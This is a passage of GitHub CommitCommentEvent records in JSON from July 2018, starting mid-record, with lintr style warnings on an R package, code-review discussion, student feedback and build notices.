zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/753241c1e706408485d3c68311e646732cf1cd68/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T07:33:56Z"}
{"id":"7987377643","type":"CommitCommentEvent","actor":{"login":"gouthambudda"},"repo":{"name":"gouthambudda/photography"},"payload":{"comment":{"id":29760260,"position":null,"line":null,"path":null,"commit_id":"a793eccca08f5c6065413d6b946817046fe96762","created_at":"2018-07-19T07:33:58Z","updated_at":"2018-07-19T07:33:58Z","author_association":"OWNER","body":"photography.buddagoutham.com"}},"created_at":"2018-07-19T07:33:58Z"}
{"id":"7987389380","type":"CommitCommentEvent","actor":{"login":"cfpp2p"},"repo":{"name":"cfpp2p/transmission"},"payload":{"comment":{"id":29760288,"position":null,"line":null,"path":null,"commit_id":"e4f9be608f1b0067499f41a16e65857fabe85270","created_at":"2018-07-19T07:36:45Z","updated_at":"2018-07-19T07:36:45Z","author_association":"OWNER","body":"https://github.com/transmission/transmission/issues/667"}},"created_at":"2018-07-19T07:36:45Z"}
{"id":"7987390034","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"kipcole9/cldr"},"payload":{"comment":{"id":29760289,"position":49,"line":239,"path":"lib/mix/tasks/compile.cldr.ex","commit_id":"e61955a776edef79a193f8d58e45fb62552cda00","created_at":"2018-07-19T07:36:55Z","updated_at":"2018-07-19T07:36:55Z","author_association":"NONE","body":"Hi @kipcole9, this is still using private APIs and it may break in future Elixir versions too. Everything in the `Mix.Dep` namespace is private. From my understanding of the code, what you are trying to build can be achieved with `Mix.Project.deps_paths`, so I would recommend using that instead."}},"created_at":"2018-07-19T07:36:55Z"}
{"id":"7987396965","type":"CommitCommentEvent","actor":{"login":"debugtalk"},"repo":{"name":"HttpRunner/HttpRunner"},"payload":{"comment":{"id":29760309,"position":null,"line":null,"path":null,"commit_id":"834154cc4ef65889949396aa4464fb64eca9d6c6","created_at":"2018-07-19T07:38:34Z","updated_at":"2018-07-19T07:38:34Z","author_association":"COLLABORATOR","body":"fix #172 #201"}},"created_at":"2018-07-19T07:38:34Z"}
{"id":"7987397680","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18002/programming-term2"},"payload":{"comment":{"id":29760311,"position":null,"line":null,"path":null,"commit_id":"974bccfdad6154349afca036e23897b5aad0b29f","created_at":"2018-07-19T07:38:44Z","updated_at":"2018-07-19T07:38:44Z","author_association":"NONE","body":"コードがスッキリしていて要求も満たせています。\r\nメニュー表も出てきてるので親切ですね。さすが!\r\n金額もリストのsumで出していてシンプルですね。\r\n\r\n注文内容が2回出力されるのだけ気になりますが、不足はないのでこの結果で満点です。お疲れ様でした。"}},"created_at":"2018-07-19T07:38:44Z"}
{"id":"7987398021","type":"CommitCommentEvent","actor":{"login":"ittaiz"},"repo":{"name":"bazelbuild/rules_scala"},"payload":{"comment":{"id":29760313,"position":46,"line":71,"path":"thrift/thrift.bzl","commit_id":"72d8cd26b267eb88c41adbefbeb357868c1a0bac","created_at":"2018-07-19T07:38:48Z","updated_at":"2018-07-19T07:38:48Z","author_association":"MEMBER","body":"@johnynek I'm working on an internal rule which uses the zipper and I looked at this for inspiration.\r\nI've noted a few things I don't really understand and I'd really appreciate your thoughts:\r\n1. We say in a comment that `We move the files and touch them so that the output file is a purely deterministic product of the _content_ of the inputs` but I don't see we move or touch them. Additionally I wrote a simple reproducibility test which passes with the current `cmd`. Do you think this is just stale? Maybe from pre `zipper` time?\r\n2. Both here and in the empty case below we `rm` the intermediate outputs. Why is that?\r\n\r\nThanks for your time!"}},"created_at":"2018-07-19T07:38:48Z"}
{"id":"7987401006","type":"CommitCommentEvent","actor":{"login":"beca-bakari"},"repo":{"name":"beca-bakari/beca-bakari.github.io"},"payload":{"comment":{"id":29760315,"position":null,"line":null,"path":null,"commit_id":"1f756354d9a828b68f4cee5bfd672e186063fd66","created_at":"2018-07-19T07:39:29Z","updated_at":"2018-07-19T07:39:29Z","author_association":"OWNER","body":"great"}},"created_at":"2018-07-19T07:39:29Z"}
{"id":"7987404071","type":"CommitCommentEvent","actor":{"login":"salotron"},"repo":{"name":"salotron/scenario_alt"},"payload":{"comment":{"id":29760321,"position":160,"line":3888,"path":"Scenario/Text/text_common_day2.rpy","commit_id":"ac9d83b08b3db7169cad484c8ab2ddf490b63c4f","created_at":"2018-07-19T07:40:11Z","updated_at":"2018-07-19T07:40:11Z","author_association":"OWNER","body":"\"Ты рад?\""}},"created_at":"2018-07-19T07:40:11Z"}
{"id":"7987404706","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29760322,"position":null,"line":null,"path":null,"commit_id":"1ead1079ab601f7ceb9792cef209cd6226d19d9b","created_at":"2018-07-19T07:40:19Z","updated_at":"2018-07-19T07:40:19Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:118:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/invoercontroleData_soortenKenmerken.R#L118) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:131:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/invoercontroleData_soortenKenmerken.R#L131) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/1ead1079ab601f7ceb9792cef209cd6226d19d9b/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T07:40:19Z"}
{"id":"7987411722","type":"CommitCommentEvent","actor":{"login":"ittaiz"},"repo":{"name":"bazelbuild/rules_scala"},"payload":{"comment":{"id":29760335,"position":46,"line":71,"path":"thrift/thrift.bzl","commit_id":"72d8cd26b267eb88c41adbefbeb357868c1a0bac","created_at":"2018-07-19T07:41:54Z","updated_at":"2018-07-19T07:41:54Z","author_association":"MEMBER","body":"Actually we `rm` the zipper output **before** the command. Is this so we won't add to an existing zip? Can this happen? We don't add such files as inputs so it shouldn't happen IIUC"}},"created_at":"2018-07-19T07:41:54Z"}
{"id":"7987415252","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29760351,"position":null,"line":null,"path":null,"commit_id":"7866068d1f53282e654b471adbe610c9993f984e","created_at":"2018-07-19T07:42:45Z","updated_at":"2018-07-19T07:42:45Z","author_association":"NONE","body":"確認しました。\r\n現状だと、キャンセルされたときにも「以下の内容で〜」が出てきてしまいますね。\r\nキャンセルされたらその場で終了するよう改修してみてください。\r\n\r\n注文したメニューの金額をリストに入れている点、良いと思います。\r\nこれをsum()すると合計金額が出力されるのを講義でやりましたね。"}},"created_at":"2018-07-19T07:42:45Z"}
{"id":"7987415875","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29760354,"position":null,"line":null,"path":null,"commit_id":"3281533de811948215e2b9ed57a378bb72bf3616","created_at":"2018-07-19T07:42:53Z","updated_at":"2018-07-19T07:42:53Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 42](https://teamcity.otenv.com/viewLog.html?buildId=8964953&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:15:22"}},"created_at":"2018-07-19T07:42:53Z"}
{"id":"7987416026","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29760355,"position":null,"line":null,"path":null,"commit_id":"3281533de811948215e2b9ed57a378bb72bf3616","created_at":"2018-07-19T07:42:55Z","updated_at":"2018-07-19T07:42:55Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 43](https://teamcity.otenv.com/viewLog.html?buildId=8965060&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:02"}},"created_at":"2018-07-19T07:42:55Z"}
{"id":"7987420491","type":"CommitCommentEvent","actor":{"login":"jiangzhuorong"},"repo":{"name":"jiangzhuorong/mip-extensions"},"payload":{"comment":{"id":29760364,"position":null,"line":null,"path":null,"commit_id":"97f7e05e5a292827f8068be65115a8bb3dac2f54","created_at":"2018-07-19T07:43:56Z","updated_at":"2018-07-19T07:43:56Z","author_association":"OWNER","body":"点击mip-showmore组件的展开按钮时，如果按钮的下方是a标签的话，会导致a标签的click响应"}},"created_at":"2018-07-19T07:43:56Z"}
{"id":"7987421420","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760368,"position":4,"line":3,"path":"Lesson1/area_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:44:06Z","updated_at":"2018-07-19T07:44:06Z","author_association":"OWNER","body":"ясно"}},"created_at":"2018-07-19T07:44:06Z"}
{"id":"7987422930","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760371,"position":9,"line":8,"path":"Lesson1/area_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:44:23Z","updated_at":"2018-07-19T07:44:23Z","author_association":"OWNER","body":"ясно"}},"created_at":"2018-07-19T07:44:23Z"}
{"id":"7987423909","type":"CommitCommentEvent","actor":{"login":"ChiChou"},"repo":{"name":"chaitin/passionfruit"},"payload":{"comment":{"id":29760374,"position":16,"line":27,"path":"lib/channels.js","commit_id":"3be4fb1f3aa76c11aa82d09cb0c6a8bc4f50e93d","created_at":"2018-07-19T07:44:34Z","updated_at":"2018-07-19T07:44:34Z","author_association":"COLLABORATOR","body":"OMG, thanks!"}},"created_at":"2018-07-19T07:44:34Z"}
{"id":"7987424158","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760375,"position":10,"line":9,"path":"Lesson1/area_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:44:37Z","updated_at":"2018-07-19T07:44:37Z","author_association":"OWNER","body":"ясно"}},"created_at":"2018-07-19T07:44:37Z"}
{"id":"7987425268","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29760379,"position":4,"line":4,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T07:44:52Z","updated_at":"2018-07-19T07:44:52Z","author_association":"OWNER","body":"ясно"}},"created_at":"2018-07-19T07:44:52Z"}
{"id":"7987426370","type":"CommitCommentEvent","actor":{"login":"JenaLab"},"repo":{"name":"rasmoller/HackMedDalsgaard"},"payload":{"comment":{"id":29760384,"position":null,"line":null,"path":null,"commit_id":"37837b840a32f7d4169188dca2524250f18596a2","created_at":"2018-07-19T07:45:06Z","updated_at":"2018-07-19T07:45:06Z","author_association":"NONE","body":"Good day Sir..\r\nDo you perhaps know of a hack or cheats for bingo games?\r\nI just love, love, love bingo games. But the amount of tokens is never enough. \r\n\r\nI don't know anything about what you brilliant people are doing here.....\r\nSo, needless to say, I am asking to please help me if you can?\r\nThanking you kindly in advance.\r\nJenna Labuschagne"}},"created_at":"2018-07-19T07:45:06Z"}
{"id":"7987428856","type":"CommitCommentEvent","actor":{"login":"Place1"},"repo":{"name":"Place1/node-gir"},"payload":{"comment":{"id":29760392,"position":null,"line":null,"path":null,"commit_id":"cb274c940382f6dc1a38797ed06a8ae2e8c6b373","created_at":"2018-07-19T07:45:39Z","updated_at":"2018-07-19T07:45:39Z","author_association":"OWNER","body":"Cheers, you seem to have a lot more time than me for this project. Would\nyou like commit access?\n\nOn Thu, 19 Jul 2018 at 10:20 am, Rom Grk <notifications@github.com> wrote:\n\n> Supported-ish, there's much more to do for the memory management.\n> Suggested readings:\n>\n>    -\n>    https://github.com/GNOME/gjs/blob/57d562d0cd4c4bae0748fbd5fc7ead9c64d41a8b/gi/function.cpp#L494\n>    -\n>    https://github.com/GNOME/gjs/blob/57d562d0cd4c4bae0748fbd5fc7ead9c64d41a8b/gi/function.cpp#L939\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Place1/node-gir/commit/cb274c940382f6dc1a38797ed06a8ae2e8c6b373#commitcomment-29757790>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALMBlkNCU1bVGT9yMQcYycxk_IdFD0u9ks5uH9DfgaJpZM4VVj9x>\n> .\n>\n"}},"created_at":"2018-07-19T07:45:39Z"}
{"id":"7987429015","type":"CommitCommentEvent","actor":{"login":"salotron"},"repo":{"name":"salotron/scenario_alt"},"payload":{"comment":{"id":29760393,"position":23,"line":5515,"path":"Scenario/Text/text_mi_dj.rpy","commit_id":"ac9d83b08b3db7169cad484c8ab2ddf490b63c4f","created_at":"2018-07-19T07:45:41Z","updated_at":"2018-07-19T07:45:41Z","author_association":"OWNER","body":"нейродов? гугл знает только такие нейроды http://ru.warframe.wikia.com/wiki/%D0%9D%D0%B5%D0%B9%D1%80%D0%BE%D0%B4%D1%8B"}},"created_at":"2018-07-19T07:45:41Z"}
{"id":"7987432832","type":"CommitCommentEvent","actor":{"login":"caoyaxing221"},"repo":{"name":"huobiapi/API_Docs"},"payload":{"comment":{"id":29760399,"position":null,"line":null,"path":null,"commit_id":"5811362be85f1f8cd64f5f20c9d69a3155f456e6","created_at":"2018-07-19T07:46:32Z","updated_at":"2018-07-19T07:46:32Z","author_association":"NONE","body":"怎么删掉了"}},"created_at":"2018-07-19T07:46:32Z"}
{"id":"7987432838","type":"CommitCommentEvent","actor":{"login":"kdudka"},"repo":{"name":"siteshwar/ast"},"payload":{"comment":{"id":29760400,"position":17,"line":63,"path":".travis.yml","commit_id":"bc9572a8535c3454bee7d7375c9594d41a593f47","created_at":"2018-07-19T07:46:32Z","updated_at":"2018-07-19T07:46:32Z","author_association":"COLLABORATOR","body":"On Thursday, July 19, 2018 8:57:06 AM CEST Kurtis Rader wrote:\n> @kdudka wrote:\n> > You can configure csbuild to invoke full build just once and then rebuild\n> > only files changed by the commits in question.\n> That is not true for using it in Travis AFAICT as it requires remembering\n> build state between invocations. Which is definitely not true for our\n> Travis CI use.\n\nTo clarify it, you need to build the project each time the CI is triggered\nbut you do not need to build it twice if you only look for newly introduced \npotential bugs.\n\n> @siteshwar, I understand that you need to be sensitive to the demands made\n> by your boss.\n\nWrong guess.  It is really @siteshwar who proactively enables all the various \nCI tasks for ksh upstream.  I really appreciate his effort but do not promote \ncsbuild in any way.\n\n> But incorporating `csbuild` into this project, outside of Red\n> Hat's internal build system, seems to add far more cost than benefit.\n\nActually, we do not use csbuild in the internal build system at Red Hat.\nWe use csmock, which is a Fedora/RHEL-specific tool.  csbuild is primarily \ndesigned for local builds and upstream CI services.\n\n\n"}},"created_at":"2018-07-19T07:46:32Z"}
{"id":"7987438962","type":"CommitCommentEvent","actor":{"login":"dsonet"},"repo":{"name":"arangodb/arangodb"},"payload":{"comment":{"id":29760416,"position":138,"line":152,"path":"Documentation/Books/Manual/ReleaseNotes/NewFeatures34.md","commit_id":"6fdbe43da69023a138c0a83d4c2f7936143f264d","created_at":"2018-07-19T07:47:51Z","updated_at":"2018-07-19T07:47:51Z","author_association":"NONE","body":"I guess there should be `exclusive` instead of `overwrite`."}},"created_at":"2018-07-19T07:47:51Z"}
